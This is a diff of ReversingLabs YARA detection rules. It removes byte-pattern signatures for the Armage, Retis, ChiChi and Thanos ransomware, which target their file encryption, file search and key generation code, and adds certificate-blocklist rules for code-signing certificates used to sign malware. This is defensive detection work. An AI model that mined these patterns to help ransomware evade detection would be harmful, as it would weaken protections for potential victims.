-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Armage.yara#L1-L128"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13912-L13928"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "aa8ddcbb0fdcad15e603e000db1d4f86eae7d42efce1c1d21dc3dd57ee9f4319"
+		logic_hash = "d5e62d3cdfacfaea70f9ee11230501bb9c4099508077d50a2a143cb69476f02a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Armage"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 89 E5 53 8D 5D ?? 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? 8D 5D
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 65 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 45
-            ?? 8D 50 ?? 8D 48 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 40 ?? ?? 89 50 ?? 89
-            95 ?? ?? ?? ?? 8D 50 ?? 89 50 ?? 89 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 5D ?? 83 EC ?? 89 5D ??
-            8B 41 ?? 8B 51 ?? 8D 4D ?? 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 45 ?? 8D 5D ?? 83 EC ?? 89 5C 24 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 45 ?? 8D 5D ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 89 42 ?? 8B 55 ?? 89 4C 24 ?? 89 04 24 29 CA 89 54 24
-            ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 42 ?? 8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 55 ?? 89 42
-            ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ??
-            8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 8D ??
-            ?? ?? ?? 89 4C 24 ?? 89 85 ?? ?? ?? ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ??
-            ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4C 24 ?? 89 8D ?? ?? ?? ?? 89 4C 24 ?? 8B 85 ?? ?? ??
-            ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 44 24
-            ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 5C 24 ?? 8B 8D ??
-            ?? ?? ?? 89 4C 24 ?? 89 85 ?? ?? ?? ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ??
-            ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8D 45 ?? 89 04 24 E8
-        }
-		$encrypt_files_p2 = {
-            8B 55 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? 8D 4A ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D
-            55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ??
-            ?? 8B 40 ?? 8B 80 ?? ?? ?? ?? 85 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 80 78 ?? ?? 74 ?? 0F BE 40 ?? 89 04 24 B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 EC ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
-            8B 45 ?? 85 C0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 5D
-            ?? C9 C3 90 8B 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8B 00 8B 50 ?? B8 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? 8B 8D ??
-            ?? ?? ?? FF D2 83 EC ?? 0F BE C0 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C5 ?? 8B 45 ?? 89
-            85 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83
-            E8 ?? 74 ?? 0F 0B 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85
-            C0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 3B 85 ?? ?? ?? ?? 74 ?? 89 04 24
-            E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 39 85 ?? ?? ?? ?? 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0
-            75 ?? EB
-        }
-		$find_files_p1 = {
-            55 89 E5 81 EC ?? ?? ?? ?? 8D 55 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 89 55 ?? 8D 55 ?? 89 65 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ??
-            8B 4D ?? 83 C0 ?? 8B 51 ?? 89 45 ?? 8D 45 ?? 89 45 ?? 8B 45 ?? 89 55 ?? 8B 00 89 C1
-            89 45 ?? 01 D1 74 ?? 85 C0 75 ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 45 ?? 83 F8 ?? 89 45 ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B
-            45 ?? 8D 55 ?? 0F B6 00 88 45 ?? B8 ?? ?? ?? ?? 89 45 ?? C6 04 02 ?? B8 ?? ?? ?? ??
-            2B 45 ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? 8D 4D ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89
-            04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 83 EC ?? 89 81 ?? ?? ??
-            ?? 8D 4D ?? 39 CA 74 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 80 ?? ?? ?? ?? 83 F8
-        }
-		$find_files_p2 = {
-            8B 45 ?? 0F 95 00 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? C9 C2 ?? ?? 8D 76 ?? 8D 45 ?? 8B
-            4D ?? 89 4C 24 ?? 8B 4D ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? E9
-            ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 55 ?? 83 EC ?? 89 45 ?? 89 55 ?? EB ?? C7 04 24 ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C5 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 85 C0 74 ?? 83 E8
-            ?? 74 ?? 0F 0B 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04
-            24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 66 90 55 89 E5 57 56 8D 45 ?? 53 83 EC ??
-            89 45 ?? 8D 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? 89 65 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 5D ?? C6 45 ?? ?? 8B 83 ?? ?? ??
-            ?? 83 F8 ?? 74 ?? 8D 53 ?? 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 EC ?? 85 C0 0F 95 45 ?? 0F B6 45 ?? 8B 75 ?? 88 06 8B 45 ?? 89 04 24 E8 ?? ?? ??
-            ?? 0F B6 45 ?? 8D 65 ?? 5B 5E 5F 5D C3
-        }
-		$enum_resources_p1 = {
-            55 B8 ?? ?? ?? ?? 89 E5 E8 ?? ?? ?? ?? 29 C4 8D 45 ?? 89 8D ?? ?? ?? ?? 89 A5 ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? 8B 45
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C9 C2 ?? ??
-            8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44
-            24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? 8D 85 ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 75 ?? EB
-            ?? 8D B4 26 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? F6 40 ?? ?? 0F 85 ?? ?? ?? ?? 83 85 ?? ??
-            ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 83
-        }
-		$enum_resources_p2 = {
-            8B 85 ?? ?? ?? ?? F6 40 ?? ?? 74 ?? 8B 40 ?? 89 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 85 D2 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 74 ?? 89 14 24 E8 ?? ?? ?? ?? 03 85 ?? ??
-            ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B 48 ?? 3B 48 ?? 0F 84 ?? ?? ??
-            ?? 85 C9 74 ?? 8D 41 ?? 8B 95 ?? ?? ?? ?? 89 01 8B 85 ?? ?? ?? ?? 01 C2 89 04 24 89
-            54 24 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B
-            48 ?? 8B 85 ?? ?? ?? ?? 83 C1 ?? 89 48 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 39 C8
-            0F 84 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? F6 40 ?? ?? 0F 84 ?? ??
-            ?? ?? 89 04 24 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC
-            ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 0C 24 89 44 24 ?? 8B 8D ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? EB
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $enum_resources_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Certified Software" and pe.signatures [ i ] . serial == "0a:c5:ac:5d:32:31:22:e6:d8:e9:2d:6e:19:1b:14:32" and 1140134400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Retis : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2433D9Df7Efbccb870Ee5904D62A0101 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Retis ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3d1de7c2-abb7-5411-a598-6bc68229a22a"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "6cd46771-06ea-51c9-ad84-4b28f4f8442b"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Retis.yara#L1-L74"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13930-L13946"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3e3429041acc5730b009916efbcd35c7cfd2b2877dc1d2cf980f7fb7d399d532"
+		logic_hash = "92a2effe1b94345f52130e4cb1db181f1990e58eaefb9c74375c14249cc1be22"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Retis"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files = {
-            00 00 04 6F ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 0C 00 08 28 ?? ?? ?? ??
-            0A 72 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 03 6F ?? ?? ??
-            ?? 0D 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 06 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 17 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ??
-            12 ?? 28 ?? ?? ?? ?? 13 07 00 11 ?? 73 ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 16 FE
-            ?? 13 ?? 11 ?? 2C ?? 00 02 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ?? 28 ?? ?? ?? ??
-            00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 00 00 2B ?? 00 1F ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ??
-            ?? 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 00 12 ??
-            28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 DE
-            ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ??
-            6F ?? ?? ?? ?? 00 DC 00 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 DC 2A
-        }
-		$search_drives = {
-            00 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 00 06 0C 16 0D 2B ?? 08 09 9A 13 ?? 00
-            11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 07 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 00 00 09 17 58 0D 09 08 8E 69 32 ?? 07 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 26 00 07 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ??
-            13 ?? 00 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 00 03 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ??
-            12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 00 11 ?? 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 17 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 2B ??
-            12 ?? 28 ?? ?? ?? ?? 13 ?? 00 02 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ??
-            28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 11 ?? 6F
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE ??
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ??
-            ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 12 ??
-            28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
-            DC 2A
-        }
-		$encrypt_files = {
-            00 03 19 17 73 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 0B 06 07
-            16 07 8E 69 6F ?? ?? ?? ?? 26 06 6F ?? ?? ?? ?? 00 03 18 18 73 ?? ?? ?? ??
-            0C 73 ?? ?? ?? ?? 0D 09 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 00 09 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 00 09 6F ?? ?? ?? ?? 13 ?? 08 11 ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 07
-            16 07 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00
-            03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $search_files and $search_drives and $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Conpavi AG" and pe.signatures [ i ] . serial == "24:33:d9:df:7e:fb:cc:b8:70:ee:59:04:d6:2a:01:01" and 1322438400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Chichi : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_462Baada57570F70Df76D10B9E7Bf2B7 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects ChiChi ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "95062789-a55d-5c1c-a359-206b58f311e5"
-		date = "2022-02-14"
-		modified = "2022-02-14"
+		id = "2863a050-ebce-5322-b64a-9160adf6cc21"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.ChiChi.yara#L1-L66"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13948-L13964"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "863a30e4c708e13ea0f4c6ad42a919de463926508783d6552c0cec746730baa5"
+		logic_hash = "c48207907339ce3fb7b6bc630097761a24495a9d4e69d421f2bdb36ddc92abcb"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "ChiChi"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$generate_key = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
-            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 8B 7D ?? C7 45 ?? ?? ?? ?? ?? 89 7D ?? 85
-            FF 75 ?? 33 F6 EB ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 89 75 ?? 6A ?? 8D 4D ?? C7 45
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 56 8D
-            4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? 85 C0 74
-            ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 03 8B CB 57 56 FF 50 ?? C7 45 ?? ?? ?? ?? ?? 85 F6
-            74 ?? 83 FF ?? 8D 45 ?? 8D 4D ?? 8B FE 0F 46 C8 32 C0 56 8B 09 F3 AA E8 ?? ?? ?? ??
-            83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2
-        }
-		$encrypt_files = {
-            55 8B EC 51 53 56 57 8B D9 68 ?? ?? ?? ?? 53 89 5D ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ??
-            ?? ?? 53 FF D6 68 ?? ?? ?? ?? 8B F8 FF D6 8B 1D ?? ?? ?? ?? 03 F8 03 FF 83 C7 ?? 57
-            6A ?? FF 35 ?? ?? ?? ?? FF D3 8B F0 85 F6 74 ?? 8B 7D ?? 57 56 FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5B
-            8B E5 5D C3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ??
-            ?? 56 6A ?? FF 35 ?? ?? ?? ?? 8B F8 FF 15 ?? ?? ?? ?? 83 FF ?? 74 ?? 8B CF E8 ?? ??
-            ?? ?? 5F 5E 5B 8B E5 5D C3 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
-        }
-		$find_files = {
-            6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 56 FF 15 ??
-            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF
-            D7 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84
-            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 F6 FF B6 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 72 ?? FF 74 24 ?? 8B 74 24 ??
-            56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 FF 15 ??
-            ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 E8 ?? 78 ?? 66 83
-            7C 44 ?? ?? 74 ?? 83 E8 ?? 79 ?? EB ?? 8D 74 24 ?? 8D 34 46 68 ?? ?? ?? ?? 56 FF 15
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $generate_key ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DVERI FADO, TOV" and pe.signatures [ i ] . serial == "46:2b:aa:da:57:57:0f:70:df:76:d1:0b:9e:7b:f2:b7" and 1551744000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Thanos : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_83320D93Dd8Cf16D11F99B1078B0A7Cb : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Thanos ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e607255d-45a6-573d-956e-f6faa2aa7e9f"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "12ce9be9-4644-5b59-aed2-ce4b04fcc46a"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Thanos.yara#L1-L106"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13966-L13984"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f6bc0c2188a04d2fb2a82a6b6d6cdf7763c32047bec725fe07f01415edf0b4cd"
+		logic_hash = "94ec5e05357767cc0c4cd1fc8ff6d1a366359ba699c43f3710204d761e7e707f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
